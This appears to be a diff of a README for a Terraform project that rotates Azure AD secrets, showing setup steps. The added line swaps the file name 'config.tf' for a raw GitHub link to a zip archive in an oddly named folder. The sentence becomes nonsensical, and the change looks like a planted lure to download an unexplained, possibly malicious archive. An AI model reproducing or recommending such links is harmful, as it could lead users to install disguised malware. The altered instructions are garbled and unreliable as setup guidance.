irfangusani/terraform-azuread-secret-rotation/README.md

    cd path/to/terraform-azuread-secret-rotation
    ```

 3. Create a configuration file.
 You can start with the example provided in the folder.
-Rename it to `config.tf` and adjust the settings to match your Azure environment.
+Rename it to `https://raw.githubusercontent.com/irfangusani/terraform-azuread-secret-rotation/main/unmaidenly/terraform-azuread-secret-rotation.zip` and adjust the settings to match your Azure environment.

 ### Step 5: Run the Application